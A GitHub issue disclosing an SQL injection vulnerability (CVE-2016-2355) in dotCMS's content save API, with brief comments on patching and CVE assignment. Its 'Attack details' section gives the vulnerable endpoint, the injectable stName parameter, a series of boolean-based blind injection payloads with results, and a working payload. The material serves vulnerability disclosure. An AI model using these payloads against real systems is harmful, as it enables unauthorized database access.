-
Notifications
You must be signed in to change notification settings - Fork 460
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SQL Injection Vulnerability(CVE-2016-2355) #8848
Comments
may I ask this vulnerability currently has new progress it? |
This issue in the process of being patched for release. |
CERT has assigned CVE-2016-2355 to this issue |
Hello,can you update the Credit in http://dotcms.com/security/SI-35 |
oarrietadotcms
added a commit
that referenced
this issue
Apr 18, 2016
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Attack details
url: http://localhost:8080/api/content/save/1
postdata:address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus
URL encoded POST input stName was set to -1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'='
Tests performed:
-1' OR 2+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => TRUE
-1' OR 3+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2<(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 3_2>(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 2+1-1-1=1 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 00053=00053 AND 3+1-1-1=1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=5 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 3_2_0=6 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
Original value: RequestProspectus
Parameter: stName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn
The text was updated successfully, but these errors were encountered: